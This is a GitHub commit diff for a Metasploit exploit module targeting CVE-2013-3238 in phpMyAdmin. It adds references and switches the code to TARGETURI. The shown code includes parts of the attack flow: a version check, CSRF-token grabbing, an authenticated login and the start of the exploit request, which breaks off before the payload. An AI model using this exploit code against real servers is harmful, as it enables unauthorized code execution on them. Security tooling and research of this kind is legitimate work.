Skip to content

Commit 209188b

Browse files
Meatballs1Meatballs1
committed
Add refs and use targeturi
1 parent 3ac0413 commit 209188b

File tree

1 file changed

+8
-9
lines changed

1 file changed

+8
-9
lines changed

modules/exploits/multi/http/phpmyadmin_preg_replace.rb

Lines changed: 8 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -32,6 +32,8 @@ def initialize(info = {})
3232
[ 'CVE', '2013-3238' ],
3333
[ 'PMASA', '2013-2'],
3434
[ 'waraxe', '2013-SA#103' ],
35+
[ 'EDB', '25003'],
36+
[ 'OSVDB', '92793'],
3537
[ 'URL', 'http://www.waraxe.us/advisory-103.html' ],
3638
[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php' ]
3739
],
@@ -54,19 +56,15 @@ def initialize(info = {})
5456

5557
register_options(
5658
[
57-
OptString.new('URI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
59+
OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
5860
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
5961
OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
6062
], self.class)
6163
end
6264

63-
def uri(path="")
64-
normalize_uri(datastore['PATH'], datastore['URI'], path)
65-
end
66-
6765
def check
6866
begin
69-
res = send_request_cgi({ 'uri' => uri('/js/messages.php') })
67+
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/js/messages.php') })
7068
rescue
7169
print_error("Unable to connect to server.")
7270
return CheckCode::Unknown
@@ -115,6 +113,7 @@ def check
115113
end
116114

117115
def exploit
116+
uri = target_uri.path
118117
print_status("Grabbing CSRF token...")
119118
response = send_request_cgi({ 'uri' => uri})
120119
if response.nil?
@@ -138,7 +137,7 @@ def exploit
138137

139138
login = send_request_cgi({
140139
'method' => 'POST',
141-
'uri' => uri('index.php'),
140+
'uri' => normalize_uri(uri, 'index.php'),
142141
'vars_post' => post
143142
})
144143

@@ -151,7 +150,7 @@ def exploit
151150
cookies = login.get_cookies
152151

153152
login_check = send_request_cgi({
154-
'uri' => uri('index.php'),
153+
'uri' => normalize_uri(uri, 'index.php'),
155154
'vars_get' => { 'token' => token },
156155
'cookie' => cookies
157156
})
@@ -164,7 +163,7 @@ def exploit
164163

165164
db = rand_text_alpha(3+rand(3))
166165
exploit_result = send_request_cgi({
167-
'uri' => uri('db_structure.php'),
166+
'uri' => normalize_uri(uri, 'db_structure.php'),
168167
'method' => 'POST',
169168
'cookie' => cookies,
170169
'vars_post' => {

0 commit comments

Comments
 (0)